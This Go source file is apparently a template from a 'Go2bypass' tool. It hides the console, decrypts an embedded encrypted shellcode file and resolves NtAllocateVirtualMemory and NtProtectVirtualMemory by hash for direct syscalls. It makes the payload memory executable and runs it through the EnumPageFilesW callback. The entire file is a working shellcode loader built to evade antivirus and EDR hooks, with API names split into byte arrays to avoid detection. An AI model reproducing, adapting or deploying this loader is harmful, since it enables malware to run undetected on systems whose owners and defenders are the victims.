package main

import (
	Go2gabh "Go2bypass/Doge-Gabh/Gabh"
	Go2public "Go2bypass/Public"
	_ "embed"
	"syscall"
	"os"
	"unsafe"
)

//go:embed CodeToStringShell.txt
var CodeToStringShell string

var ApiDe Go2public.ApiEDcrypt
var CodeEnContent Go2public.CodToshellKey

func main() {
	/******HideConsole******/
	Go2public.Peels()
    CodeEnContent.KeyKey = `/******KeyKey******/`
	CodeEnContent.CodeToStringShell = CodeToStringShell
	/******DecodeType******/
	sc, err := ApiDe.CodeToShellDncrypt(CodeEnContent)
	if err != nil {
		os.Exit(0)
	}
	EnumPageFilesW, _, _ := Go2gabh.DiskFuncPtr(string([]byte{'p', 's', 'a', 'p', 'i', '.', 'd', 'l', 'l'}), "27a2229b308599a48d1ca5d8ca86bcba9cd84de3", Go2public.Str2sha1)
    	alloc, e := Go2gabh.GetSSNByNameExcept(Go2public.Str2sha1(string([]byte{'N', 't', 'A', 'l', 'l', 'o', 'c', 'a', 't', 'e', 'V', 'i', 'r', 't', 'u', 'a', 'l', 'M', 'e', 'm', 'o', 'r', 'y'})), Go2public.Str2sha1)
    	if e != nil {
    		os.Exit(0)
    	}
    	protect, e := Go2gabh.GetSSNByNameExcept(Go2public.Sha256Hex(string([]byte{'N', 't', 'P', 'r', 'o', 't', 'e', 'c', 't', 'V', 'i', 'r', 't', 'u', 'a', 'l', 'M', 'e', 'm', 'o', 'r', 'y'})), Go2public.Sha256Hex)
    	if e != nil {
    		os.Exit(0)
    	}
    	const (
    		mt = uintptr(0x00001000)
    		me = uintptr(0x00002000)
    	)

    	var handle = uintptr(0xffffffffffffffff)
    	var baseA uintptr
    	regionsize := uintptr(len(sc))
    	_, r := Go2gabh.HgSyscall(
    		uint16(alloc),
    		handle,
    		uintptr(unsafe.Pointer(&baseA)),
    		0,
    		uintptr(unsafe.Pointer(&regionsize)),
    		uintptr(mt|me),
    		syscall.PAGE_READWRITE,
    	)
    	if r != nil {
    		os.Exit(0)
    	}
    	Go2public.Cpymem(baseA, sc)

    	var oldprotect uintptr
    	_, r = Go2gabh.HgSyscall(
    		uint16(protect),
    		handle,
    		uintptr(unsafe.Pointer(&baseA)),
    		uintptr(unsafe.Pointer(&regionsize)),
    		syscall.PAGE_EXECUTE_READ,
    		uintptr(unsafe.Pointer(&oldprotect)),
    	)
    	if r != nil {
            os.Exit(0)
    	}
    	syscall.Syscall(uintptr(EnumPageFilesW), 2, baseA, 0, 0)
}
